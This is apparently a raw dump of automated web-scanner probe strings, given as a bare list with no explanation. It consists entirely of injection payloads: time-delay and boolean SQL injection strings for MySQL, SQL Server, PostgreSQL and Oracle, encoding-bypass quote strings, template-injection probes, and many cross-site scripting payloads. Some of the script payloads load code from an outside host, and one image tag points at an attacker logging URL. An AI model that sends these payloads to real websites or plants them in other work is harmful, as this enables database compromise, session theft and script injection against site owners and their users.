(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/








-1; waitfor delay '0:0:15' --










-1); waitfor delay '0:0:15' --








-1 OR 5*5=25 --
-1)); waitfor delay '0:0:15' --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'Eky3rtVC'='
-1" OR 5*5=25 or "hfHXa3Jy"="
-1 waitfor delay '0:0:15' --
if(now()=sysdate(),sleep(15),0)
KxMGaGKp'; waitfor delay '0:0:15' --

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
CfPFXIv2'); waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
aVVwWtuV')); waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1 OR 142=(SELECT 142 FROM PG_SLEEP(15))--

-1; waitfor delay '0:0:15' --
-1) OR 262=(SELECT 262 FROM PG_SLEEP(15))--

-1); waitfor delay '0:0:15' --
-1)) OR 187=(SELECT 187 FROM PG_SLEEP(15))--

-1 waitfor delay '0:0:15' --
K02pmgZB' OR 854=(SELECT 854 FROM PG_SLEEP(15))--

UHeQpUsx'; waitfor delay '0:0:15' --
e4WhXFmY') OR 561=(SELECT 561 FROM PG_SLEEP(15))--

P0l8xG9B'); waitfor delay '0:0:15' --
2X29WKqQ')) OR 37=(SELECT 37 FROM PG_SLEEP(15))--

1el0u3Qq')); waitfor delay '0:0:15' --
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

A3SZxvj9' OR 797=(SELECT 797 FROM PG_SLEEP(15))--
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'"
%C0%A7%C0%A2%2527%2522\'\"

2CeES6BN') OR 368=(SELECT 368 FROM PG_SLEEP(15))--
@@uqpD4
(select 198766*667891)
(select 198766*667891 from DUAL)

TpqN3eq2')) OR 176=(SELECT 176 FROM PG_SLEEP(15))--

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'



'"

%C0%A7%C0%A2%2527%2522\'\"
@@vdqez
(select 198766*667891)
(select 198766*667891 from DUAL)
























































































































'"()&%<zzz><ScRiPt >qYzT(9315)</ScRiPt>
'"()&%<zzz><ScRiPt >qYzT(9559)</ScRiPt>
9431088
bfg3385<s1﹥s2ʺs3ʹhjl3385
bfgx8772%C0%BEz1%C0%BCz2a%90bcxhjl8772
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >qYzT(9475)</ScRiPt>
<WF7Z0G>DMMOZ[!+!]</WF7Z0G>
<script>qYzT(9484)</script>
<script>qYzT(9650)</script>9650
<ScR<ScRiPt>IpT>qYzT(9065)</sCr<ScRiPt>IpT>
<ScRiPt
>qYzT(9433)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9473></ScRiPt>
<isindex type=image src=1 onerror=qYzT(9767)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9483'>
<body onload=qYzT(9758)>
<img src=//xss.bxss.me/t/dot.gif onload=qYzT(9514)>
<img src=xyz OnErRor=qYzT(9744)>
<img/src=">" onerror=alert(9886)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%71%59%7A%54%289636%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\qYzT(9303)\u003C/sCripT\u003E
<ScRiPt>qYzT(9276)</sCripT>
%F6<img zzz onmouseover=qYzT(95241) //%F6>
<input autofocus onfocus=qYzT(9217)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(qYzT(9812))}
4wJA5
<ScRiPt >qYzT(9216)</ScRiPt>
<WJSQVU>TE7YB[!+!]</WJSQVU>
<ifRAme sRc=9659.com></IfRamE>
<aFkvUxx x=9739>
<img sRc='http://attacker-9638/log.php?
<aRIIYAU<